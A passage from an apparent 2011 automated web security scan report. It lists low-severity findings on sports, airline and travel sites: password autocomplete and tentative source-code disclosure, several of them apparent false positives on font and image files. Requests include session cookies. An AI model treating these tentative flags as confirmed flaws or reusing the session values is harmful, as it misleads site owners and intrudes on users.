Content-Type: text/html; charset=utf-8
Last-Modified: Sun, 02 Oct 2011 12:29:58 GMT
Server: Microsoft-IIS/7.5
LastModified: Sun, 02 Oct 2011 12:29:58 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web8
Content-Length: 19323
Cache-Control: public, max-age=1
Date: Mon, 03 Oct 2011 00:00:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<div style="display:inline;" id="toolbarlogin"><form action="/One-United/Login.aspx?redirectPath=/en/Fanzone/Competition-And-Polls.aspx" method="post" style="width:505px;"><label for="loginEmail">
...[SNIP]...
</label><input type="password" id="loginPassword" name="loginPassword" /><input type="hidden" id="returnPath" name="returnPath" value="/en/Fanzone/Competition-And-Polls.aspx" class="hiddeninput" />
...[SNIP]...
15.17. http://www.manutd.com/en/News-And-Features/Football-News/2011/Oct/sir-alex-ferguson-proud-of-home-record-after-norwich-win.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /en/News-And-Features/Football-News/2011/Oct/sir-alex-ferguson-proud-of-home-record-after-norwich-win.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /en/News-And-Features/Football-News/2011/Oct/sir-alex-ferguson-proud-of-home-record-after-norwich-win.aspx HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/en.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.2.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Last-Modified: Sun, 02 Oct 2011 12:29:58 GMT
Server: Microsoft-IIS/7.5
LastModified: Sun, 02 Oct 2011 12:29:58 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web7
Content-Length: 28270
Cache-Control: public, max-age=553
Date: Sun, 02 Oct 2011 23:50:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<div style="display:inline;" id="toolbarlogin"><form action="/One-United/Login.aspx?redirectPath=/en/News-And-Features/Football-News/2011/Oct/sir-alex-ferguson-proud-of-home-record-after-norwich-win.aspx" method="post" style="width:505px;"><label for="loginEmail">
...[SNIP]...
</label><input type="password" id="loginPassword" name="loginPassword" /><input type="hidden" id="returnPath" name="returnPath" value="/en/News-And-Features/Football-News/2011/Oct/sir-alex-ferguson-proud-of-home-record-after-norwich-win.aspx" class="hiddeninput" />
...[SNIP]...
15.18. http://www.manutd.com/en/One-United.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /en/One-United.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /en/One-United.aspx HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/en/News-And-Features/Football-News/2011/Oct/sir-alex-ferguson-proud-of-home-record-after-norwich-win.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.3.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Last-Modified: Sun, 02 Oct 2011 12:29:58 GMT
Server: Microsoft-IIS/7.5
LastModified: Sun, 02 Oct 2011 12:29:58 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web8
Content-Length: 23135
Cache-Control: public, max-age=328
Date: Sun, 02 Oct 2011 23:54:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<div style="display:inline;" id="toolbarlogin"><form action="/One-United/Login.aspx?redirectPath=/en/One-United.aspx" method="post" style="width:505px;"><label for="loginEmail">
...[SNIP]...
</label><input type="password" id="loginPassword" name="loginPassword" /><input type="hidden" id="returnPath" name="returnPath" value="/en/One-United.aspx" class="hiddeninput" />
...[SNIP]...
15.19. http://www.turkishairlines.com/en-CA/index.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.turkishairlines.com
Path:   /en-CA/index.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /en-CA/index.aspx HTTP/1.1
Host: www.turkishairlines.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.turkishairlines.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ksso3m55td3pq4almj0x3k45; __utma=1.1413828058.1317599904.1317599904.1317599904.1; __utmb=1.1.10.1317599904; __utmc=1; __utmz=1.1317599904.1.1.utmcsr=manutd.com|utmccn=(referral)|utmcmd=referral|utmcct=/Search-Results.aspx

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 79854


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr
...[SNIP]...
<div class="miles radius-4px shadow-4px">

<form method="post" action="https://www4.thy.com/tkmiles/j_security_check?lang=en">
<input type="hidden" value="TK" id="tk" name="tk">
...[SNIP]...
</span>
<input class="text small input-numeric" type="password" name="j_password" id="j_password" value="" size="6" />
</span>
...[SNIP]...
15.20. http://www.turkishairlines.com/en-CA/quick_search_part.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.turkishairlines.com
Path:   /en-CA/quick_search_part.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /en-CA/quick_search_part.aspx?p=award HTTP/1.1
Host: www.turkishairlines.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.turkishairlines.com/en-CA/index.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ksso3m55td3pq4almj0x3k45; __utma=1.1413828058.1317599904.1317599904.1317599904.1; __utmb=1.2.10.1317599904; __utmc=1; __utmz=1.1317599904.1.1.utmcsr=manutd.com|utmccn=(referral)|utmcmd=referral|utmcct=/Search-Results.aspx

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:01:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1739

<form id="odulBiletLogin" name="tklogin" action="http://www4.thy.com/troyaonline/mainPageAwardStart.tk?lang=en" method="post">
<input type="hidden" value="TK" name="tk">
...[SNIP]...
</label>
<input style="width:145px;" type="password" class="medium float-left" name="j_password" id="texta2" maxlength="6" />
</div>
...[SNIP]...
16. Source code disclosure  previous  next
There are 15 instances of this issue:

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

16.1. http://travela.priceline.com/hotel/js/searchValidation.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://travela.priceline.com
Path:   /hotel/js/searchValidation.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /hotel/js/searchValidation.js?v=072511 HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://travela.priceline.com/hotel/searchResults.do?jsk=5463010a5064010a2011100300091519d011589950&key=gtapcnq5&showDP=y&NYOPRedirNI=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=58AA51FFBF9D4E024C54F62C7478894F; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; vsch=v2011100300090989417126%5F98264026; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; JSessionKey=5463010a5064010a2011100300091519d011589950; Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A09%3A15&ID=IGOUGO&PRODUCTID=&SOURCEID=PL; PSessKey=

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:12:20 GMT
Server: Apache
Last-Modified: Thu, 29 Sep 2011 15:53:40 GMT
ETag: "f0072a-6a00-4ae16832b2900"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 27136
Content-Type: text/javascript

var pageType;
function validateSearchFormURL(sURL, sActionAddOn) {
var checkInField = document.getElementById('checkInDate');
var checkOutField = document.getElementById('checkOutDate');

...[SNIP]...
tElementById(errorOuterDiv)) document.getElementById(errorOuterDiv).style.display = "";
       
           //document.getElementById("NewSearch").style.height='320px';
       }
       else{
           
           //var sURL = "http://<%=request.getServerName() + request.getContextPath() + CreateLink.appendSessionKey("/rateSelectionDirect.do",request)%>"+
               //"&checkInDate="+checkInField.value+"&checkOutDate="+checkOutField.value+"&propID="+lightBoxpropID+"&numberOfRooms="+numOfRooms;            
           //var params="&checkInDate="+checkInField.value+"&checkO
...[SNIP]...
16.2. http://travelocity.ugc.bazaarvoice.com/module/0025-en_us/cmn/0025-en_us/display.pkg.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://travelocity.ugc.bazaarvoice.com
Path:   /module/0025-en_us/cmn/0025-en_us/display.pkg.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /module/0025-en_us/cmn/0025-en_us/display.pkg.js HTTP/1.1
Host: travelocity.ugc.bazaarvoice.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://travel.travelocity.com/hotel/HotelDetail.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?tab=guide&tripType=hotel&propertyId=4810&airport=BOS&resetReview=true&hotelQKey=-2237575859332798600&tsHotelQKey=-2237575859332798600&reviewPage=reviewStart&locLink=HOTEL.HOTELAVAILABILITYLISTLITE1|NAT1&dr=4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP="Bazaarvoice does not have a P3P policy."
Last-Modified: Fri, 30 Sep 2011 14:20:29 GMT
Content-Type: text/javascript;charset=utf-8
Vary: Accept-Encoding
Content-Length: 126517
Cache-Control: max-age=478
Expires: Mon, 03 Oct 2011 00:19:09 GMT
Date: Mon, 03 Oct 2011 00:11:11 GMT
Connection: close

$BV.Internal.define("jquery.effects.core",[document],["jquery.core"],function(a,b){
/*
* jQuery UI Effects 1.8.6
*
* Copyright 2010, AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under t
...[SNIP]...
<H;E++){G.call(F,E)}};C.mixin=function(E){d(C.functions(E),function(F){q(F,C[F]=E[F])})};var k=0;C.uniqueId=function(E){var F=k++;return E?E+F:F};C.templateSettings={evaluate:/<%([\s\S]+?)%>/g,interpolate:/<%=([\s\S]+?)%>/g};C.template=function(H,G){var I=C.templateSettings;var E="var __p=[],print=function(){__p.push.apply(__p,arguments);};with(obj||{}){__p.push('"+H.replace(/\\/g,"\\\\").replace(/'/g,"\\'").replace(I.
...[SNIP]...
16.3. http://www.aon.com/manchesterunited/vagroundedstd-light-webfont.ttf  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.aon.com
Path:   /manchesterunited/vagroundedstd-light-webfont.ttf

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /manchesterunited/vagroundedstd-light-webfont.ttf HTTP/1.1
Host: www.aon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.aon.com/manchesterunited/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FDA5F4B4BB1AB049D12027B006BB7DA5; s_pers=%20gpv_pageName%3D/manchesterunited/%7C1317601722252%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"55356-1314119279000"
Last-Modified: Tue, 23 Aug 2011 17:07:59 GMT
Content-Length: 55356
Date: Sun, 02 Oct 2011 23:59:12 GMT

...........0BASE?bO........4FFTMG.GM... ....GDEF.;.........8GPOS...........4GSUB/.%.........OS/2z.7*.......`cmap..A.........cvt ..    O..
P...2fpgm../....t...egasp............glyf...t...P....head.C.....<
...[SNIP]...
<HH<%.oJ|...,D'BP2KXK2u..1"....8- -...)H1].2$....T='6."$L7Ds..............8.....+../.    3......./.....    ....
+.@..    +...
+.@..    +...+.017.#"43!2.+...."&..++.b++..(.).MRR........:...b.....9.....+.
......+..3.../.....    .......+..    ....+........99.01..462.....265.462......"..:.(.g.g.(.#6KHPHK6#.........YS__S.......{Ej=''=j........(...........+....+..3.../...+.6.....m..+
...............<A.m..+
............
.........+.....+.......+.........+.....+.... . .#....9..9.... . .#....9..9.@...
......................@...
......................@...01%.>.32......."&'.&54632.................*............................^..................)...%.......+..3."..+..    33..&/....$    ..'.+.6.....N..+
..$...%...    .....=..r..+
................t.r..+
...............>..N..+
...............@...............$%.................@...............%................@...017.62..3.632......#"&'.#...#"'.&54632....
F
..].)...l.4..
...
..4.l...).]l.?##...9)......:.#.
..#.:.E....).......    ...I...........+..3...+..3.. /.!.+.6..4=....+
.....................+
..    ............4=....+.........+.....    ...    ..+.4=....+.........+.....    ...    ..+.4=....+.........+............+.4=....+.........+............+.@.....    ....................@.....    ....................@...01...#"&47..&4632..7632........#"'.)............................9.......;... ...... ............................+....+.3.../.....    ....
+.@..    +...
+.@..    +...+.6...w....+
.........
...    ..6.....+
.........    
..
..........    
.............    
........@...017..&54632...632........"&................(.).%.7....................................K.....+....../......./...+.6..55.o..+
..............................@..017.!"&463!2.....!2...#!"54).n..............g.....c4W.%.$... ...$.(....L...............+........+......./...+.01..32...+."5.4;.2...#."....E//E.......x. .0..0. ..............H.....+....+.../...+.6........+
............    ......    .........    .....@...01%.&54632......#".3..............e.............................+........+......./...+.01..#"&46;.2...+."&463S"....E//E........ .0.@0. .....8.!. ..........+.../...+.6..7.....+
..
..................+
..................8..W..+.........+.....+.... . .#....9..9.@    ..
................@    ..
................@...01....#"&547.62......"&'.,..
.......:.... ...v....... .8)).. ....................../......+......+.../.    .+.01.!"43!2..........}22......_.......S.../......+.../...+..    .    .+...+.6........+
............    ......    .........    .....@...01.'&54632......#".s#....s#....h/....    /.........#.........!.X.....+..3........+..3.!...."/.....    .......+...22..    ..#.+........99..!....    ..$.9.....901....#"&=.#.#"&4632.354632....264&".......8Yl~~lPA.......H.HH....6....%P...G......vv.v......>...    .......o.....+..3........+....+...... /.....    ...2..    .?.+......+..    ..!.+........99..........$.9........9......99.....901...264&"..462...3>.32..."'#..."&.H.HH...(...J0h{{.&..(..X.vv.v.[.........+...I..........#.........S.....+.......
+....    +....+.......
+...        +.../.....    ....
+....    +..2...+.........990164632....#"&#"...32632...#"#}sAN...<!KMMK#=
"L@s...'....w.w.%.*...#...........w.....+..3........+....+...... /.....    .......+..2..    ......    .?.+../.!.+..........$.9........99.......    9.....99......9901$4&"...2.5#."&4632..3.462....."&..H.HH.?.&.{{h0J...(..(...vv.v..I...+........T................!.g.....+........+.........+....<.+.."/.....    ...2......+..    ..#.+.........999......99.......    .99......9901%!..32>.32....#"&54632....%!4&#&.....UH(A!
..Kx|.lg~....$IDKI.F\....."K.sq..g..B@d.a................W.....+....+............+..3......2.../.....2..    ...2...
+....    +.@..    +...
+.@.
   +. .+.01...."&5.#"4;.546;.2...+."..32.#..(.$,,$B3...0.$7,,...a......L}7<..&#.L....#.(.....$.,.......+.(......+.......
+...
   +....+."3.,....-/....&    ..&..*.+..    .?.+.....    .../..3...+.&....
.99........(+$.9..*..."9..(.....9.,.....999.....901....#"&54632..326=.#.#"&4632..354632....264&"...mE....0F)MD.-Zl~~l(L........H.HH....7v.@!....aC.L...).......vv.v.....:....... .I..
..+..3....+....+......!/.....    ...2......+..    ..".+.......9.........9901%.4&"....."&5.462....632......"&..JbJ.(..(..7\!>8".(.)."ABBA..............F.-Q6.........0...........Q.....+....+......+.
..+.../....    ...+..    ...+....+..    .../..    ....+..........$.9.01...."&5.462.&462..."..(..(.b , ,...>.........., , ......0.(.........O.....+......+.
..+../.../....    ...+..    ...+....+..    .../..    ....+..........$.9.01...."&5.462.&462..."..(..(.b , ,...l.........., , ....:...............+..3....+.
..+.../.....    ...2. .+.6..'.....+
.................
.t..+
.................................................@...017.462...7632.........."&/...."&:.(................(.)................................:.........!.....+.
..+.../.....    ...    ...+.01...."&5.462...(..(....T.............:.......4.i.....+.%233....+...33.....,2..5/....    ...2......+.0    ..0..(.+.#    ..6.+.......9.0...9.(...9........9.....901%.4&#"....."&5.462....>.32.632......"&5.4&#"....."&.u<65<.(..(....:%]5?d!>8".(.<65<.(.).*9BB9.................ZZ.-Q6.......*9BB9........:....... .E.....+..3.
..+..3......!/.....    ...2......+..    ..".+......
9..
.....9017.462....632......"&5.4&"....."&:.(..7\!>8".(.JbJ.(.)........F.-Q6......."ABBA..........#...........J.....+........+......./....        ..    ...+..    ....+.    .......$.9...........$.9016462..."...264&"#~.~~.&H.HH........^.vv.v....>.(.    .......o.....+........+..3....../.. /.....    ...2..    .?.+......+..    ..!.+........99..........$.9.........99......99.....901...264&"..462...362...#"&'#..."&.H.HH...(..&.{{h0J...(..X.vv.v.........I...+........#.(.........s.....+........+..3....../.. /.    ...    .......+.2..    ......    .?.+../.!.+........
.$.9........99........9.....    99.....901$4&"...2$462.35462....."&=.#..#"..H.HH...{.&..(..(...J0h..vv.vT..I......l......+....:...=.....=.....+....+..3....+.+.../.....    ...2...
+.@..    +...+........9017.462...3>.32.........."&:.(...D#..7/E.(.)......-#9..&
.IF..................).......+.!...!.
+..!.    +....+.....
+..        +..*/.....    ....
+....    +....$.+..    ..$.
+..$.    +.+.+.6........+
..(..&.............+.(..'(&.+.... . .#....9.'(&..9.....&'(...........&'(.......@....!.....9901.4632....#"..#"........"&5462..32654...mH<u..."4$(5;SS;r.x..,B*.9;SS;..EQ7'....# .(.$?+OUA$..! +..-!%>.............L.....+../..3......2...
+.@..    +.../.....2.    ...2..
+.@
   +..
+.@..    +...+.01.5462...32.+...."&5.#"43V.(.$,,$.(.$,,..s....sL.a......L.....:.........9.....+.    ......+.3.../.....    .....
.+..    
...[SNIP]...
16.4. http://www.expedia.com/static/default/default/images/hotel-sprite.gif  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.expedia.com
Path:   /static/default/default/images/hotel-sprite.gif

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /static/default/default/images/hotel-sprite.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"22991-1317085621866"
Last-Modified: Tue, 27 Sep 2011 01:07:01 GMT
Content-Length: 22991
Date: Mon, 03 Oct 2011 00:10:23 GMT
Connection: close

GIF89a*.&....)........r..M.."w.$z.......W..M........F..7v.5......................3..............2..3.............5_..............E....q....................f.%~.....n.....Oy............................
...[SNIP]...
.......0Y.........O......`....[p....=F...h..r....6|..y!..6_....E..0d....C..q.b..."....N.........`...I.........p.b..>f....:q.......................o..........t...i............3f.........!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 ">
...[SNIP]...
</x:xmpmeta> <?xpacket end="r"?>.................................................................................................................................~}|{zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONMLKJIHGFEDCBA@?>
...[SNIP]...
16.5. http://www.expedia.com/static/default/default/images/infosite/bg_button_b.gif  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.expedia.com
Path:   /static/default/default/images/infosite/bg_button_b.gif

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /static/default/default/images/infosite/bg_button_b.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information?chkin=10%2F04%2F2011&chkout=10%2F07%2F2011&rm1=a1&hwrqCacheKey=ccf4a420-af8b-480f-8413-efb42e880287HWRQ&hashTag=roomsAndRates&rfrr=-5517&c=d20f4232-e339-420a-bcb4-97cad88f9b0f&&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=0; MediaCookie=0`1034,1004,PDEST,BOS; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"1127-1317085582989"
Last-Modified: Tue, 27 Sep 2011 01:06:22 GMT
Content-Length: 1127
Date: Mon, 03 Oct 2011 00:13:12 GMT
Connection: close

GIF89a........f..........!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 ">
...[SNIP]...
</x:xmpmeta> <?xpacket end="r"?>.................................................................................................................................~}|{zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONMLKJIHGFEDCBA@?>
...[SNIP]...
16.6. http://www.expedia.com/static/default/default/images/infosite/bg_button_span_b.gif  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.expedia.com
Path:   /static/default/default/images/infosite/bg_button_span_b.gif

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /static/default/default/images/infosite/bg_button_span_b.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information?chkin=10%2F04%2F2011&chkout=10%2F07%2F2011&rm1=a1&hwrqCacheKey=ccf4a420-af8b-480f-8413-efb42e880287HWRQ&hashTag=roomsAndRates&rfrr=-5517&c=d20f4232-e339-420a-bcb4-97cad88f9b0f&&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=0; MediaCookie=0`1034,1004,PDEST,BOS; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"1216-1317085591679"
Last-Modified: Tue, 27 Sep 2011 01:06:31 GMT
Content-Length: 1216
Date: Mon, 03 Oct 2011 00:13:11 GMT
Connection: close

GIF89a........f..........!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 ">
...[SNIP]...
